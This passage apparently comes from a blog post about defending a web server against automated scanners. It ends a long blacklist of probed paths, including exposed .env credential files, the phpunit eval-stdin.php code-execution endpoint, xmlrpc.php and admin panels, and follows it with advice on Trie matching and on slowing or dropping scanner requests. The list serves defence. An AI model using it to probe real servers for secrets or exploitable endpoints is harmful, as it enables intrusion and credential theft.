/sql/phpMyAdmin/index.php
/sql/sql-admin/index.php
/sql/sqladmin/index.php
/sql/sql/index.php
/sql/sqlweb/index.php
/sql/webadmin/index.php
/sql/webdb/index.php
/sql/websql/index.php
/staging/downloader/index.php
/staging/errors/503.php
/staging/index.php/admin/
/staging/rss/catalog/notifystock
/staging/rss/catalog/review
/staging/rss/order/new
/static/common/js/common.js
/static/common/js/global.js
/static/data/configjs.js
/static/data/thirdgames.json
/static/diff_worker.js
/static/download/style.css
/_static/.env
/static/guide/ab.css
/static/home/css2/login--1.css
/static/index/css/iindex.css
/static/index/js/lk/order.js
/statics/js/API.js
/static/wap/css/index.css
/static/xianyu/js/bankCheck.js
/step1.asp
/store/downloader/index.php
/store/errors/503.php
/store/index.php/admin/
/store/rss/catalog/notifystock
/store/rss/catalog/review
/store/rss/order/new
/t3
/telescope/requests
/temp/
/template/920ka/js/woodyapp.js
/template/css/login.css
/template/js/comm/Confrim.js
/Templates/user/js/global.js
/template/tmp1/js/common.js
/test/
/__tests__/test-become/.env
//test/wp-includes/wlwmanifest.xml
/thinkphp/html/public/index.php
/tmp/
/TP/html/public/index.php
/TP/index.php
/TP/public/index.php
/tutorial_asset_bundle/v0/Android/60/608951a207465476c128f1aaa739346935905dd291da63d09b6917eb67996291
/user/login
/v1/
/v2/
/vendor/phpunit/phpunit/LICENSE
//vendor/phpunit/phpunit/phpunit.xsd
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/views/commData/commonSite.js
/.vscode/.env
/Vuln.php
/wap/api/exchangerateuserconfig!get.action
/wap/trading/get_newallorder_ajax
/web/
/webdav/
//website/wp-includes/wlwmanifest.xml
/website/wp-includes/wlwmanifest.xml
//web/wp-includes/wlwmanifest.xml
/wordpress/
//wordpress/wp-includes/wlwmanifest.xml
/wp/
/wp1/
//wp1/wp-includes/wlwmanifest.xml
/wp2/
//wp2/wp-includes/wlwmanifest.xml
/wp-admin
/wp-content/
//wp-includes/wlwmanifest.xml
/wp-includes/wlwmanifest.xml
/wp-login.php
//wp/wp-includes/wlwmanifest.xml
/ws_utc/config.do
/ww.js.map
/xmlrpc.php
//xmlrpc.php
/xy/
/xyz

How to check if a URL is on a blacklist?

I recommend using the Trie rather than saving the list in a Set. Trie is an efficient structure which supports checking prefix.

How to defense?

There are many ways, but be careful not to make your server overflow and make sure that the protection does not increase the probability of a DDoS attack. I suggest the following 3 ways.

  1. Quickly respond to the scanning request. Not elegant, IMHO.
  2. Drop the request at the Transport Layer (the TCP connection) without sending the ACK packet. However, this requires intervention at the lower layer of your server. The scanner may send a keep-alive package (not the keep-alive HTTP header) at a predefined interval to detect the disconnection.
  3. Maintain a fixed-length queue to hold these requests and slowly respond and close them at a random time length. Note that: the queue must have a predefined maximal length, otherwise, your server will face a higher chance of a DDoS attack.
Buy Me A Coffee

Sign up for more like this.

Enter your email
Subscribe